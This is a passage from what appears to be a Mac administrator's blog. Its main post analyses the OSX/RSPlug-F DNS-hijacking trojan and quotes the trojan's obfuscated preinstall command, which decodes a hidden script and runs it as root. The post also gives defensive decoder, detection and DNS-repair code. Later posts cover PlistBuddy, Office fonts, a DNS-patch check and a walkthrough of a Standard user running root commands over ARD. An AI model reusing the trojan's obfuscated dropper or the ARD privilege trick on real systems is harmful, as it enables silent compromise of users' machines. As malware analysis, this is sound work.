Tearing Apart OSX/RSPlug-F

OK… I might be a bit late to the party (and Conficker is grabbing all the headlines), but I found some interesting things looking at the headline-grabbing trojan OSX/RSPlug-F. Thanks to the effervescent Graham Cluley for his witty post with a video demonstration of OSX/RSPlug-F being detected; it's what started this investigation.

So, being the curious guy I am, I decided to download the very same file Graham did in his demo. While hdtvxvid.org had since fixed their hijacked page, luckily the status bar in the video showed a readable URL that, with some squinting, I was able to decipher… So I downloaded the sucker, and you can too!

Live Code: OSX/RSPlug-F trojan

And what else can I say but: I'll be darned if I can get the thing to work! Actually, I can get it to run, but thanks to some coding errors it's a dud out of the box.

So let’s start the dissection:

The URL downloads HDTVPlayerv3.5.dmg, which contains install.pkg; if you're using Safari on a Mac with the damnable default of "Open 'Safe' files after downloading" enabled, it goes straight to Installer. Let me note that "Open 'Safe' files after downloading" is the stupidest thing to happen to browsers since ActiveX. The air quotes around "Safe" do not help, Apple; they're a sly wink and a nod that no file type is totally safe, but *shrug* whatcha gonna do? I'll tell you what: don't make it a dang default!

[Screenshot: Firefox has already cached the RSPlug download before Save is clicked]

Firefox is not off the hook either; let me bring up the poisonous Firefox convenience of "predownloading". Did everyone notice how the virus alert pops up for Graham before he clicks Save? Firefox starts the download into its cache immediately; when the user clicks Save it copies the file to the destination, and if they click Cancel the file stays in the cache anyway. I think Firefox's behaviour is ridiculous. Yes, it might make me happy when I download some ginormous game demo and come back hours later, having forgotten to click Save, pleasantly surprised that "hey, it's already here!", but otherwise let me decide what goes on my hard drive, and when.

Anyway… let's look at an Installer window the average user never opens: Show Files.

./AdobeFlash
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/version.plist

The first suspect things are a single flat file called AdobeFlash and then Mozillaplug.plugin, which is really just the mysterious VerifiedDownloadPlugin. No mention of Cinema, eh?

Take a gander at the Info.plist inside install.pkg to see where it goes:
IFPkgFlagDefaultLocation = /Library/Internet Plug-Ins/

So then, why would it need root privileges for an admin-writable folder, eh?
IFPkgFlagAuthorizationAction = RootAuthorization, for those following along in the Info.plist.
Bonus: CFBundleGetInfoString = who cares
Double Secret Bonus:
Resources/en.lproj/Description.plist IFPkgDescriptionDescription = shutdafuckup

Strangely, when you look at the log Installer.app writes to /var/log/installer.log, neither OS mentions root:
Leopard says: "admin auth received to install"
Tiger says: "Administrator authorization granted."
I don't know why you wouldn't want the log to state clearly that root privileges were granted, but there you have it: it doesn't.

So what does it do with the root privileges? Hmmm? Let's look at the preinstall and preupgrade scripts, which are identical because apparently the author didn't realize a single preflight script would kill two birds with one stone.

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -37 $0 | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
yksrepsak 777 nigeb
O(2/H178PI@(C%6;EQ&<#-RX"-Y(2/21$1!!52M
.... <SNIP> ....
*4F;DI`8*(B(`A$8*TD(`5T4^<3+4EC-8
`
dne

OK, so it takes the tail of itself (the last 37 lines, via tail -37 $0), runs that through a sed one-liner that reverses every line character by character, which turns the backwards uuencoded blob into something uudecode can read (yksrepsak 777 nigeb … dne is begin 777 kaspersky … end read right to left), decodes it to stdout, then replaces 'applemac' with 'AdobeFlash' (remember, that's the file in the bom payload), 'bsd' with 7000, and 'gnu' with a 0/1 value that depends on whether the script was called with exactly one argument. After all that sed nonsense it writes the result to a file named after the output of uname -p (i386 or powerpc), executes it with sh (as root), deletes the file, and exits.
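To make that unpacking step concrete, here is a safe re-implementation of it in Python, written for this page rather than taken from the trojan: it un-reverses the lines, uudecodes the begin/end block and applies the three sed swaps, without ever handing the result to sh. The stage-two payload is a constructed stub (the real one is snipped above), and the pack_like_rsplug() helper exists only to build a blob in the same layout so the decoder can be exercised offline.

```python
import binascii

# Constructed stand-in for the real stage-two script (the real blob is snipped
# on the page); it only needs to contain the three tokens the sed swaps look for.
SAMPLE_STAGE2 = (
    b"#!/bin/sh\n"
    b"# stage two stub, constructed for this example\n"
    b"dst=applemac port=bsd mode=gnu\n"
    b"echo applemac applemac\n"
)

# 'yksrepsak 777 nigeb' and 'dne' in the script are these two lines read backwards
BEGIN = "begin 777 kaspersky"
END = "end"


def reverse_lines(text):
    """What the sed one-liner does: reverse every line character by character."""
    return "\n".join(line[::-1] for line in text.split("\n"))


def sed_swaps(type_flag):
    """The three substitutions the preinstall script pipes through sed.
    type_flag is 1 when the script was invoked with exactly one argument, else 0."""
    return [("applemac", "AdobeFlash"), ("bsd", "7000"), ("gnu", str(type_flag))]


def pack_like_rsplug(payload):
    """Helper for this example: uuencode, then reverse every line, header and
    trailer included, which is the layout tail -37 $0 sees."""
    lines = [BEGIN]
    for i in range(0, len(payload), 45):            # uuencode packs 45 bytes per line
        chunk = payload[i:i + 45]
        lines.append(binascii.b2a_uu(chunk, backtick=True).decode("ascii").rstrip("\n"))
    lines.append("`")                               # zero-length line ends the data
    lines.append(END)
    return reverse_lines("\n".join(lines))


def unpack_rsplug(blob, type_flag):
    """Undo the obfuscation without executing anything: un-reverse the lines,
    uudecode between begin/end, then apply the swaps the script applies."""
    lines = reverse_lines(blob.replace("\r\n", "\n")).split("\n")
    starts = [i for i, l in enumerate(lines) if l.startswith("begin ")]
    if not starts:
        raise ValueError("no 'begin' line after un-reversing; not the expected layout")
    start = starts[0]
    ends = [i for i, l in enumerate(lines) if l == END and i > start]
    if not ends:
        raise ValueError("no 'end' line after the begin line")
    body = b"".join(binascii.a2b_uu(l.encode("ascii"))
                    for l in lines[start + 1:ends[0]] if l)
    text = body.decode("utf-8", errors="replace")
    # sed 's/x/y/' without the g flag only touches the first match on each line
    out = []
    for line in text.split("\n"):
        for old, new in sed_swaps(type_flag):
            line = line.replace(old, new, 1)
        out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    blob = pack_like_rsplug(SAMPLE_STAGE2)
    print(blob)                     # what the bottom of the preinstall script looks like
    print(unpack_rsplug(blob, 0))   # what sh would have been handed, as root
```

Point the real preinstall script at unpack_rsplug() (read it, drop the first line, pass the rest) and you get the i386/powerpc script as text instead of a running process; the type_flag only changes the one number the script substitutes for 'gnu'.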

Well, we'll get to the 'unencrypted' payload in a sec; first let's run this and see what happens. [Screenshots: the install failing on Leopard and on Tiger.] They fail. As a consequence, AdobeFlash is NOT installed; it's the same code as the preinstall script, though, so we're still not off the hook here. Let's see where we're at:

The root crontab is altered to include: * */5 * * * /Library/Internet Plug-Ins/AdobeFlash
(Note the leading *: that fires every minute during hours 0, 5, 10, 15 and 20, not once every five hours.) Since the script fails, the package does not install, so the crontab entry pointing at it is useless…

i386 is left behind in the root directory; it never gets a chance to delete itself. All those && statements mean "execute the next step only if the last one succeeded", and since the sh step fails, the rm never runs.

i386 contains more backward uuencoded data and more sed replacements, then pipes it all into perl. Here's the perl code it attempts to run; unfortunately it fails on line 14 and goes no further. But let's say we fix the code so it can talk to the server, get a response, and parse the output into a file…

685 is downloaded to /tmp, where it runs, does some more sed string swaps and a secret-decoder-ring translation of the DNS server addresses, outputs this, the nasty part that changes your DNS entries, then deletes the temp file. It makes good use of the very handy concept of "here documents" to script scutil and change the DNS servers. The servers seem to rotate (you get new ones every time you run it); suffice to say the Ukrainian subnet 85.255.112.xxx is totally compromised, as is 94.247.2.109, the Latvian server the files are downloaded from. But who knows who's financing and running it in this global day and age. The propensity for matryoshka-style nested code seems telling, though :)

Running some dig commands against those servers shows they currently give back valid answers, but I only tested a few sites; they might only redirect for select dummy bank sites they have set up. Who knows…
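As an added example (mine, not from the post or the trojan), here is a small indicator check for the two footprints described above: a resolver from the 85.255.112.0/24 range in `scutil --dns` output, and the root crontab entry pointing at /Library/Internet Plug-Ins/AdobeFlash. The scutil and crontab samples embedded below are constructed, not captured from an infected machine; run as a script it also reads the live values, and the crontab read needs sudo.

```python
import ipaddress
import re
import subprocess

# Indicators taken from the writeup above
ROGUE_RESOLVER_NET = ipaddress.ip_network("85.255.112.0/24")
CRON_PAYLOAD = "/Library/Internet Plug-Ins/AdobeFlash"

# `scutil --dns` prints one "nameserver[N] : <addr>" line per resolver address
NAMESERVER_RE = re.compile(r"nameserver\[\d+\]\s*:\s*(\S+)")


def rogue_resolvers(scutil_dns_output):
    """Addresses in `scutil --dns` output that fall inside the rogue /24."""
    hits = []
    for m in NAMESERVER_RE.finditer(scutil_dns_output):
        try:
            addr = ipaddress.ip_address(m.group(1))
        except ValueError:
            continue                    # scoped IPv6 or garbage; not what we're after
        if addr.version == 4 and addr in ROGUE_RESOLVER_NET:
            hits.append(str(addr))
    return hits


def rogue_cron_entries(crontab_text):
    """Non-comment crontab lines that run the dropped AdobeFlash binary."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#") and CRON_PAYLOAD in line]


def assess_host(scutil_dns_output, crontab_text):
    """Summarise both checks; 'infected' is True if either footprint is present."""
    resolvers = rogue_resolvers(scutil_dns_output)
    cron = rogue_cron_entries(crontab_text)
    return {"rogue_resolvers": resolvers, "rogue_cron": cron,
            "infected": bool(resolvers or cron)}


# Constructed samples (not captured from a real machine)
SAMPLE_SCUTIL = """DNS configuration

resolver #1
  nameserver[0] : 85.255.112.36
  nameserver[1] : 85.255.112.101
  order   : 200000

resolver #2
  domain  : local
  options : mdns
"""
SAMPLE_CRONTAB = "# m h dom mon dow command\n* */5 * * * /Library/Internet Plug-Ins/AdobeFlash\n"
CLEAN_SCUTIL = "resolver #1\n  nameserver[0] : 192.168.1.1\n"


def live_assessment():
    """Run the same checks against this Mac (needs sudo for root's crontab)."""
    dns = subprocess.run(["scutil", "--dns"], capture_output=True, text=True).stdout
    cron = subprocess.run(["sudo", "crontab", "-l", "-u", "root"],
                          capture_output=True, text=True).stdout
    return assess_host(dns, cron)


if __name__ == "__main__":
    print(assess_host(SAMPLE_SCUTIL, SAMPLE_CRONTAB))
    print(live_assessment())
```

The resolver check is the one that matters after a successful run: the cron entry only appears if the install got that far, but the scutil change is what actually sends your traffic through their servers.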

The lesson here is: always use Installer's Show Files to look at what's being installed, check what authorization level is being requested, check out the pre/post scripts, and generally do what only the most vigilant 1% of the population would do, and you'll be fine. Hopefully root authorization will carry more weight in the Installer.app UI and say "Hey, are you sure you want to grant root, REALLY!?", pre/postflight scripts will be easier to inspect from the UI (I am dreaming, aren't I?), the logs won't lie about the auth level (very doable), and Firefox will respect my wishes and only truly save when I click Save… (it's open source and easy to change, but it'll take a flame war to settle it).

Until then, I hope you enjoyed this malware tour, stay safe and away from porn sites with 3rd party HD codecs.

Update:
I suppose it'd be helpful to add instructions on how to reverse the scutil modifications. Here's the script (the code might look familiar):

#!/bin/sh
# Must run as root: the DNS key lives under State:/Network in the system configuration store
if [ "$(id -u)" -ne 0 ]; then echo "Please run with sudo" && exit 1; fi
# Ask scutil which network service is primary; the DNS override lives under that service ID
PSID=$( (/usr/sbin/scutil | /usr/bin/grep PrimaryService | /usr/bin/sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
d.show
quit
EOF
)

# Drop the DNS entry the trojan set on the primary service
/usr/sbin/scutil << EOF
remove State:/Network/Service/$PSID/DNS
quit
EOF

echo "Please toggle your network adapter on/off to refresh DNS servers from DHCP"

Basically it nukes the DNS entries that got hosed; toggling the adapter then pulls the DNS info back down from DHCP, unless you have manually entered DNS settings, in which case you should know what you're doing.

New PlistBuddy Behaviour

So, the new unibody MacBooks come with build 9G2133 of 10.5.6, while build 9G55 of 10.5.6 is what's generally available. What's more, /usr/libexec/PlistBuddy has been updated as well:

9G2133 (new):
-rwxr-xr-x 1 root wheel 84400 Sep 24 17:21 PlistBuddy

9G55 (old):
-rwxr-xr-x 1 root wheel 73792 Apr 7 2008 PlistBuddy

What’s changed with PlistBuddy is this:
* Now, exits with non-zero status on failure (like the man page says)
* Writes errors to stderr instead of stdout

What this might mean to you: if you have a script that tests the stdout of PlistBuddy to detect errors instead of the exit code (which hasn't worked until now), then that script might just keep going and going and going…

For example: I use PlistBuddy to add icons to the Dock in custom pkgs I make for work. So the other day when I ran the base packages, Adobe Acrobat being one of them, one just kept going, never finishing. Looking in install.log I found my script stuck in a loop, counting ever higher…

Mar 23 12:42:45 BlankMacBookUni runner[641]: postflight[648]: Print: Entry, "persistent-apps:546217:tile-data:file-label", Does Not Exist

In about 30 minutes it had gotten up to 546,217 attempts to read the Dock plist (that's a big log file!). Since my script was testing the stdout string, which was now blank because the error was going to stderr, it didn't know it had reached the end!

To illustrate how I changed the code to cope with either version, here's the snippet that detects whether it's at the end of the plist, based on the output (or lack thereof):

Old code:
if [[ "$output" == *Does\ Not\ Exist ]]; then

New Code:
if [[ "$output" == *Does\ Not\ Exist ]] || [ -z "$output" ]; then
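Here is the same walk over persistent-apps written in Python as an added example (mine, not the script from the post), with the end-of-list test done the way that survives both builds: a non-zero exit is a failure, and otherwise stdout and stderr are merged before looking for "Does Not Exist". It also caps the number of indices it will try, so an unexpected output change can never produce another 546,217-line log. The two fake_*_plistbuddy() runners are constructed stand-ins for the old and new builds so the walk can be exercised on a machine without PlistBuddy; the real runner shells out to /usr/libexec/PlistBuddy.

```python
import subprocess

PLISTBUDDY = "/usr/libexec/PlistBuddy"


def run_plistbuddy(args):
    """Real runner: returns (exit status, stdout, stderr) for one PlistBuddy call."""
    p = subprocess.run([PLISTBUDDY] + list(args), capture_output=True, text=True)
    return p.returncode, p.stdout, p.stderr


def entry_exists(result):
    """Decide whether a Print succeeded under either PlistBuddy build:
    old (9G55): error text on stdout, exit 0; new (9G2133): error on stderr, exit non-zero."""
    rc, out, err = result
    if rc != 0:
        return False
    text = (out + err).strip()
    return bool(text) and not text.endswith("Does Not Exist")


def dock_labels(plist_path, runner=run_plistbuddy, limit=500):
    """Collect persistent-apps labels until the first missing index. `limit` caps
    the walk so a future output change cannot loop forever like the original script."""
    labels = []
    for i in range(limit):
        key = "persistent-apps:%d:tile-data:file-label" % i
        result = runner(["-c", "Print " + key, plist_path])
        if not entry_exists(result):
            break
        labels.append(result[1].strip())
    return labels


# Simulated PlistBuddy builds (constructed), so the walk can be exercised anywhere
def fake_old_plistbuddy(labels):
    """Mimics 9G55: 'Does Not Exist' goes to stdout and the exit status is 0."""
    def runner(args):
        key = args[1][len("Print "):]
        i = int(key.split(":")[1])
        if i < len(labels):
            return 0, labels[i] + "\n", ""
        return 0, 'Print: Entry, "%s", Does Not Exist\n' % key, ""
    return runner


def fake_new_plistbuddy(labels):
    """Mimics 9G2133: the same message on stderr and a non-zero exit status."""
    def runner(args):
        key = args[1][len("Print "):]
        i = int(key.split(":")[1])
        if i < len(labels):
            return 0, labels[i] + "\n", ""
        return 1, "", 'Print: Entry, "%s", Does Not Exist\n' % key
    return runner


if __name__ == "__main__":
    import os
    dock = os.path.expanduser("~/Library/Preferences/com.apple.dock.plist")
    print(dock_labels(dock))
```

The shell equivalent of entry_exists() is to run PlistBuddy with 2>&1, test $? first and only then look at the text; the limit is the part most scripts forget.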

So, we'll see if this is rolled into 10.5.7; probably. For Tiger, I use the PlistBuddy found in /Library/Receipts/iTunesX.pkg/Contents/Resources/; as of iTunes 8.1 it is still the older version.

Hope this is of use to someone. Thanks for reading.

A new start…

OK, I’ve upgraded my WordPress install, as well as trying the WP_Spamfree plugin.

You know I had 3,500 spam trackbacks awaiting moderation? That my WP install had been hacked AGAIN, and my cryptograph plugin disabled? Sheesh. I really would like to allow comments and trackbacks, but the spam is horrendous (literally, quite the vilest stuff you can imagine). Anyway, here's hoping it works. Going to give it a day or two and see how it goes.

I’ve got some good stuff planned to share. #1 being how to make standard pkg files for Acrobat Reader and CS3 and CS4… w00t.

10.4.11 DNS results from doxpara.com

The results are in for my iBook G4 running 10.4.11 with Security Update 2008-005, using the DNS checker at doxpara:

Your name server, at 206.141.xxx.50, appears to be safe, but make sure the ports listed below aren’t following an obvious pattern (:1001, :1002, :1003, or :30000, :30020, :30100…).

Requests seen for cf2cfda1b5c1.doxdns5.com:

206.141.xxx.50:3831 TXID=31583

206.141.xxx.40:6670 TXID=27344

206.141.xxx.35:49337 TXID=35665

206.141.xxx.38:10792 TXID=50022

206.141.xxx.36:11111 TXID=63897

 

There are some who say things aren't all right, but the patch from Apple seems to satisfy the tool of the researcher who found the bug, and nCircle doesn't provide the command line or tool they used to obtain their results. So I feel confident in this patch as-is, especially since BIND isn't turned on anyway and I'm not using my own DNS server (the vast majority of Mac owners aren't either); I'm using my DSL provider AT&T's DNS servers for resolution, so it's them I hope have patched all their routers. And I'm sure they did, Tuesday before last.
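The doxpara message leaves the pattern check to the reader, so here is that check as an added example (mine, not doxpara's code): it parses the "address:port TXID=n" lines, and flags source ports or transaction IDs that march in a fixed stride (1001, 1002, 1003) or sit in a narrow band (30000, 30020, 30100). The 2048-port window is my own threshold, and the SEQUENTIAL_RESULTS sample is constructed to show what an unpatched resolver would look like. Five samples are far too few for any statistical judgement; this only catches the obvious patterns the message warns about.

```python
import re

# One line per request as printed by the doxpara checker; the third octet is
# masked with 'xxx' on the page, so accept either digits or xxx there.
LINE_RE = re.compile(r"(\d+\.\d+\.(?:\d+|xxx)\.\d+):(\d+)\s+TXID=(\d+)")

# The results above, copied from the page
PAGE_RESULTS = """
206.141.xxx.50:3831 TXID=31583
206.141.xxx.40:6670 TXID=27344
206.141.xxx.35:49337 TXID=35665
206.141.xxx.38:10792 TXID=50022
206.141.xxx.36:11111 TXID=63897
"""

# Constructed: what an unpatched resolver with sequential ports would look like
SEQUENTIAL_RESULTS = """
10.0.0.53:1001 TXID=4321
10.0.0.53:1002 TXID=4322
10.0.0.53:1003 TXID=4323
"""


def parse_results(text):
    """(address, source port, TXID) tuples in the order the checker saw them."""
    return [(ip, int(port), int(txid)) for ip, port, txid in LINE_RE.findall(text)]


def fixed_stride(values):
    """True when every consecutive difference is the same (1001, 1002, 1003; a constant value counts too)."""
    if len(values) < 3:
        return False
    diffs = {b - a for a, b in zip(values, values[1:])}
    return len(diffs) == 1


def narrow_band(values, width=2048):
    """True when all samples sit inside a small window (30000, 30020, 30100 style).
    width is this example's assumption, not a figure from doxpara."""
    return len(values) >= 3 and max(values) - min(values) < width


def assess_ports(text):
    rows = parse_results(text)
    ports = [p for _, p, _ in rows]
    txids = [t for _, _, t in rows]
    issues = []
    if fixed_stride(ports):
        issues.append("source ports follow a fixed stride")
    if narrow_band(ports):
        issues.append("source ports confined to a narrow band")
    if fixed_stride(txids):
        issues.append("transaction IDs follow a fixed stride")
    return {"samples": len(rows), "issues": issues, "obviously_patterned": bool(issues)}


if __name__ == "__main__":
    print(assess_ports(PAGE_RESULTS))
    print(assess_ports(SEQUENTIAL_RESULTS))
```

Paste the block of lines the checker printed into assess_ports(); an empty issues list with the page's five samples is what you see above, and it is only that: no obvious pattern, not proof of good randomness.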

x86 Inertia

So I was reading this interview with Stephen Morse, the designer of the 8086, which is 30 years old this year. A couple of points it makes: being in the right place at the right time is sometimes all it takes to be part of something big, and the inertia of what already exists greatly affects future designs. Here are a couple of quotes from Stephen I liked:

I always regret that I didn’t fix up some idiosyncrasies of the 8080 when I had a chance. For example, the 8080 stores the low-order byte of a 16-bit value before the high-order byte. The reason for that goes back to the 8008, which did it that way to mimic the behavior of a bit-serial processor designed by Datapoint (a bit-serial processor needs to see the least significant bits first so that it can correctly handle carries when doing additions). Now there was no reason for me to continue this idiocy, except for some obsessive desire to maintain strict 8080 compatibility. But if I had made the break with the past and stored the bytes more logically, nobody would have objected. And today we wouldn’t be dealing with issues involving big-endian and little-endian; the concepts just wouldn’t exist.

Basically once you start a bad habit it’s hard to break, which leads on to this:

I’m a PC guy. I long resisted the Mac because there were still programs that were written for the PC and would not run on the Mac. I felt it was like the Betamax/VHS story: Betamax was a better technology, but anyone buying a Betamax recorder would have a small selection of tapes available to rent and would be limited in who they could share tapes with. Now that you can get a Mac that executes x86 code, the situation has changed somewhat, but I’ve resisted a Mac for so long that it’s hard to switch gears at this point.

I just find it humorous that these de facto standards in the industry are sometimes just the product of how someone started doing it one way and everyone followed suit; even if there was a better or different way to do things, it's not how everyone else is doing it, and that's inertia… or entropy? Seems like you need a shake every so often to keep things fresh, yes?

What’s in the Time Machine Update?

Here's the meat of what gets updated: the backup daemon helper and FileVault image tool, loginwindow.app, the Broadcom and Atheros wireless kexts, lots of System.kext plugins (BSD, IOKit, Libkern, MAC Framework, Mach), the AFP filesystem kext, the metadata server, the backupd launch daemon plists, and the DiskImages framework.

 

/System/Library/CoreServices/SystemVersion.plist
/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd-helper
/System/Library/CoreServices/backupd.bundle/Contents/Resources/fvimagetool
/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow
/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros.kext/Contents/MacOS/AirPortAtheros
/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AppleAirPortBrcm4311.kext/Contents/MacOS/AppleAirPortBrcm4311
/System/Library/Extensions/System.kext/PlugIns/BSDKernel.kext/BSDKernel
/System/Library/Extensions/System.kext/PlugIns/IOKit.kext/IOKit
/System/Library/Extensions/System.kext/PlugIns/Libkern.kext/Libkern
/System/Library/Extensions/System.kext/PlugIns/MACFramework.kext/MACFramework
/System/Library/Extensions/System.kext/PlugIns/Mach.kext/Mach
/System/Library/Extensions/System.kext/PlugIns/System6.0.kext/kernel.6.0
/System/Library/Extensions/System.kext/PlugIns/Unsupported.kext/Unsupported
/System/Library/Filesystems/AppleShare/afpfs.kext/Contents/MacOS/afpfs
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Support/mds
/System/Library/LaunchDaemons/com.apple.backupd-attach.plist
/System/Library/LaunchDaemons/com.apple.backupd-auto.plist
/System/Library/LaunchDaemons/com.apple.backupd-wake.plist
/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages
/usr/share/man/man1/tmdiagnose.1

Here's hoping that the update, in tandem with the AirPort/Time Capsule update, fixes some of the problems people have had using a hard drive as an AirPort Disk on the AirPort Extreme. For me it wasn't even about Time Machine; the real pain was that transfers were SLOW even over 100 Mb/s Ethernet (dang it, I jumped the gun and didn't get the GigE model), and sometimes the AirPort Disk couldn't be mounted on my computers until the AirPort was restarted. Also, with the update the ever-mysterious Wide Area Bonjour prefs are still around; they're behind the Name > Edit… button now.

One more thing… /usr/share/man/man1/tmdiagnose.1: hmmm, is this a Time Machine diagnostics tool? Let's have a look at the man page:

tmdiagnose(1)             BSD General Commands Manual            tmdiagnose(1)

NAME
     tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsed
     for whatis database.

SYNOPSIS
     tmdiagnose, [-abcd] [-a path] [file] [file …] arg0 arg2 …

DESCRIPTION
     Use the .Nm macro to refer to your program throughout the man page like such: tmdiagnose, Underlining
     is accomplished with the .Ar macro like this: underlined text.

     A list of items with descriptions:

     item a   Description of item a
     item b   Description of item b

     A list of flags and their descriptions:

     -a       Description of -a flag
     -b       Description of -b flag

FILES
     /usr/share/file_name                          FILE_1 description
     /Users/joeuser/Library/really_long_file_name  FILE_2 description

SEE ALSO
     a(1), b(1), c(1), a(2), b(2), a(3), b(3)

Darwin                           April 2, 2008                          Darwin

 

Only a dummy man page, and no executable to be found. Its origins are in the BSD package (see /Library/Receipts/boms/com.apple.pkg.BSD.bom). No change has been made to this man page since 10.5, yet it's included with this update? Odd. My guess is there's an Apple-internal tool in use, not something for the general public. I mean, why would the 'Rest of Us' need to diagnose Time Machine?! It just works, right? ;)

Office 2008 fonts

A postscript to fonts (hehe): I wanted to mention how Office 2008 replaces your Apple-supplied fonts with Microsoft fonts, moving the Apple ones into /Library/Fonts Disabled. Well, I like my Apple fonts just fine, thank you, so for posterity here's a list of the fonts that get bumped:

Tiger and Leopard Conflicts:

Andale Mono
Arial
Arial Black
Arial Narrow
Arial Rounded Bold
Brush Script
Comic Sans MS
Georgia
Impact
Times New Roman
Trebuchet MS
Verdana

Leopard Only Conflicts:

Tahoma
Wingdings 2
Wingdings 3

Also, just so you know, there is a set of fonts that Microsoft calls its ClearType Font Collection; these can be found on Vista and Office 2007 for Windows (and Office 2008). They are:

Calibri Bold Italic.ttf
Calibri Bold.ttf
Calibri Italic.ttf
Calibri.ttf
Cambria Bold Italic.ttf
Cambria Bold.ttf
Cambria Italic.ttf
Cambria.ttf
Candara Bold Italic.ttf
Candara Bold.ttf
Candara Italic.ttf
Candara.ttf
Consolas Bold Italic.ttf
Consolas Bold.ttf
Consolas Italic.ttf
Consolas.ttf
Constantia Bold Italic.ttf
Constantia Bold.ttf
Constantia Italic.ttf
Constantia.ttf
Corbel Bold Italic.ttf
Corbel Bold.ttf
Corbel Italic.ttf
Corbel.ttf

All named C, like when parents name all their kids with the same letter, a bizarre practice I've never understood. I have yet to do more testing, but in an attempt to find out what the bare minimum required fonts are, this seems like a good place to start.

And what the hey, here's the rest of the Office 2008 fonts, minus the conflicts and the ClearType Collection:

Abadi MT Condensed Extra Bold
Abadi MT Condensed Light
Baskerville Old Face
Batang.ttf
Bauhaus 93
Bell MT
Bernard MT Condensed
Book Antiqua
Bookman Old Style
Bookshelf Symbol 7.ttf
Braggadocio
Britannic Bold
Calisto MT
Century
Century Gothic
Century Schoolbook
Colonna
Cooper Black
Copperplate Gothic Bold
Copperplate Gothic Light
Curlz MT
Desdemona
Edwardian Script ITC
Engravers MT
Eurostile
Footlight Light
Franklin Gothic Book Italic.ttf
Franklin Gothic Book.ttf
Franklin Gothic Medium Italic.ttf
Franklin Gothic Medium.ttf
Garamond
Gill Sans MT Bold Italic.ttf
Gill Sans MT Bold.ttf
Gill Sans MT Italic.ttf
Gill Sans MT.ttf
Gill Sans Ultra Bold
Gloucester MT Extra Condensed
Goudy Old Style
Gulim.ttf
Haettenschweiler
Harrington
Imprint MT Shadow
Kino
Lucida Blackletter
Lucida Bright
Lucida Calligraphy
Lucida Console.ttf
Lucida Fax
Lucida Handwriting
Lucida Sans
Lucida Sans Typewriter
Lucida Sans Unicode.ttf
Marlett.ttf
Matura Script Capitals
Meiryo Bold Italic.ttf
Meiryo Bold.ttf
Meiryo Italic.ttf
Meiryo.ttf
Mistral
Modern No. 20
Monotype Corsiva
Monotype Sorts
MS Gothic.ttf
MS Mincho.ttf
MS PGothic.ttf
MS PMincho.ttf
MS Reference Sans Serif.ttf
MS Reference Specialty.ttf
MT Extra
News Gothic MT
Onyx
Perpetua Bold Italic.ttf
Perpetua Bold.ttf
Perpetua Italic.ttf
Perpetua Titling MT
Perpetua.ttf
Playbill
PMingLiU.ttf
Rockwell
Rockwell Extra Bold
SimSun.ttf
Stencil
Tw Cen MT Bold Italic.ttf
Tw Cen MT Bold.ttf
Tw Cen MT Italic.ttf
Tw Cen MT.ttf
Wide Latin
Wingdings


Office 2008 12.0.1 Update almost does it

So the Office 2008 12.0.1 updater came out; it's got a whole lot of packages, one for each app and component, with postflight scripts written in Python to clean up all the permissions:

Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: setting ownership/permissions
Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: fixing setuid flags
Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: clearing ACLs
Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: sanitizing receipts

Doing an ls -lRFG in /Applications/Microsoft Office 2008 won't leave you seeing red anymore; they've cleaned that up quite nicely.

Anyway, call me picky, but it forgets just one thing: the /Library/Fonts/Microsoft folder. It leaves that and its contents owned by UID 502 and marked executable (fonts don't need to be executable). As paranoid as that postflight is, it's still not quite right. So after you've put your tinfoil hat on and run 12.0.1, you can do this to finish the job:

# take away everyone's execute bit on the font files (no -R here: stripping x from the folder itself would block traversal)
sudo chmod a-x /Library/Fonts/Microsoft/*
# recursively own the folder and all the fonts as root, admin group
sudo chown -R root:admin /Library/Fonts/Microsoft

Update: or you can open the updater with Show Package Contents, navigate to Contents/Packages and run Office2008_en_fonts_12.0.1.incremental.pkg again; that'll do the trick.

Applescript Language Guide for Leopard Released (Finally)

So just today I was this close to going on the AppleScript mailing list to find out why the AppleScript Language Guide for Leopard had yet to be released; despite being touted as "the essential guide for scripters and developers" on the Apple website, the old version from 1999 was all that could be found since Leopard's release last year.

But today, with as little fanfare as possible, it was released.

Now go forth and…

tell Safari
get all documents containing “Applescript 2.0”
end tell

ARD Security Awareness (Standard User can run root commands)

Did you know a Standard user can run commands as root via ARD?
This seems really odd, doesn't it? Why would this be necessary? The thing that gets me is that in Tiger you had to explicitly grant each user the privileges after starting the ARD service, but in Leopard, when you start the service, All Users is the default.

So let's take a walkthrough of what I was looking into this Friday evening:
  • Find a Mac running Leopard.
  • Turn on Remote Management (yes, you do have to be an admin to do this).
  • Notice the default is for All Users to have access.
  • Create a Standard user in Leopard.
  • Great, now go get a machine with ARD on it.
  • Add the computer to your ARD list using the standard user's credentials.
  • Send it a Unix command to run as root (touch /HaxorWasHere, in this case).
  • Notice the new file owned by root in a place where no standard user can put things.

Interestingly, perhaps because I had done this a number of times and Leopard got confused after a while, I tried deleting the file through Finder (while logged in as 'test' but authenticating as an administrator) and got this message:

OK, that oddity aside, here's another: you don't need to have everything checked in ARD's preferences to accomplish this. Here's the bare minimum:

  • Generate reports
  • Open and quit applications
  • Change settings
  • Delete and replace items
  • Restart and shut down
  • Copy items

